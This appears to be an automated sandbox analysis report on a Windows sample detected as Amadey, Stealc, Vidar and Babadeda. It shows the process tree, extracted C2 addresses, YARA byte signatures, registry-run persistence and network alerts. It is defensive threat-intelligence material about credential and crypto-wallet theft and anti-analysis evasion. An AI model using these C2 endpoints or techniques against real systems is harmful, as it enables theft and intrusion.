Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1483195
MD5:	45fd30020c12378c242dc90687edc24c
SHA1:	934cd43ff8bd35e77d7df2cbc3aa5d96b672e4bf
SHA256:	f4a7d43dc4cdf21cc7a58af7c66386cea1616658f15b996691fbb85a7cb06b9d
Tags:	exe
Infos:

Detection

Amadey, Babadeda, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Amadeys stealer DLL

Yara detected Babadeda

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3436 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 45FD30020C12378C242DC90687EDC24C)

cmd.exe (PID: 7384 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RoamingCBFCFBFBFB.exe (PID: 7440 cmdline: "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" MD5: 8EF54B7689AF3A0FE5028BC42964BB26)

axplong.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 8EF54B7689AF3A0FE5028BC42964BB26)

cmd.exe (PID: 7580 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RoamingIJDGCAEBFI.exe (PID: 7624 cmdline: "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" MD5: 2AF5EB9FB318C9A454DE54914E121031)

explorti.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" MD5: 2AF5EB9FB318C9A454DE54914E121031)

WerFault.exe (PID: 8076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368 MD5: C31336C1EFC2CCB44B4326EA793040F2)

axplong.exe (PID: 7796 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 8EF54B7689AF3A0FE5028BC42964BB26)

explorti.exe (PID: 8156 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 2AF5EB9FB318C9A454DE54914E121031)

explorti.exe (PID: 7656 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 2AF5EB9FB318C9A454DE54914E121031)

48f0ec6733.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe" MD5: 45FD30020C12378C242DC90687EDC24C)

WerFault.exe (PID: 7664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1048 MD5: C31336C1EFC2CCB44B4326EA793040F2)

ee7a49fbf0.exe (PID: 7632 cmdline: "C:\Users\user\1000003002\ee7a49fbf0.exe" MD5: 2DE90BE7036903B103DCAA9B3CF3E2E8)

cmd.exe (PID: 7720 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 8144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 8008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7040 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

firefox.exe (PID: 7892 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

axplong.exe (PID: 7648 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 8EF54B7689AF3A0FE5028BC42964BB26)

firefox.exe (PID: 6056 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6968 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6700 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8424 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

msedge.exe (PID: 3452 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8844 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9364 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

48f0ec6733.exe (PID: 7884 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe" MD5: 45FD30020C12378C242DC90687EDC24C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "85.28.47.31/5499d72b3a3e55be.php"}

Threatname: Vidar

{"C2 url": "http://85.28.47.31silence"}

Threatname: Amadey

{"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
C:\Users\user\1000003002\ee7a49fbf0.exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x15c8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000003.2270021811.00000000052F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1408:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000F.00000003.2298982313.00000000048F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2307792347.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000003.2298393028.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000003.2263477354.0000000005010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000013.00000002.3273644345.0000000000661000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000003.2269241540.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000014.00000003.2655374647.00000000048A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x9d0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000F.00000002.2339495217.0000000000661000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000002.2338863000.0000000000661000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2309993575.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.3280286776.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.2310315083.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000003.2654668083.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000003.2237950583.0000000004D70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000002.2283696962.0000000000751000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: file.exe PID: 3436	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 3436	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 3436	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3436	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 48f0ec6733.exe PID: 7496	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 48f0ec6733.exe PID: 7496	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 48f0ec6733.exe PID: 7884	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 48f0ec6733.exe PID: 7884	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author
24.0.ee7a49fbf0.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
24.2.ee7a49fbf0.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
14.2.explorti.exe.660000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.axplong.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.2.explorti.exe.660000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.2.axplong.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.RoamingIJDGCAEBFI.exe.e70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
15.2.explorti.exe.660000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.RoamingCBFCFBFBFB.exe.750000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.axplong.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe, ProcessId: 7656, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\48f0ec6733.exe

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3436, TargetFilename: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe, ProcessId: 7656, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\48f0ec6733.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:02.018560+0200
SID:	2044246
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:03.889387+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:04.074873+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:03.978363+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:04.167115+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:01.806810+0200
SID:	2044244
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:09.878806+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:10:24.507923+0200
SID:	2044243
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:10:06.972949+0200
SID:	2856122
Source Port:	80
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:56.350187+0200
SID:	2022930
Source Port:	443
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T20:09:19.522483+0200
SID:	2803304
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 142.250.186.163 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:10:21.763678+0200
SID:	2012510
Source Port:	443
Destination Port:	49791
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:11.402795+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:03.426741+0200
SID:	2044248
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:02.028955+0200
SID:	2044247
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T20:09:17.190606+0200
SID:	2803304
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 142.250.186.99 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:10:43.434167+0200
SID:	2012510
Source Port:	443
Destination Port:	64128
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T20:10:05.333597+0200
SID:	2803305
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:14.147674+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T20:09:04.057100+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:09:14.570552+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T20:10:08.878728+0200
SID:	2044243
Source Port:	49732
Destination Port:	80
Protocol:	TCP
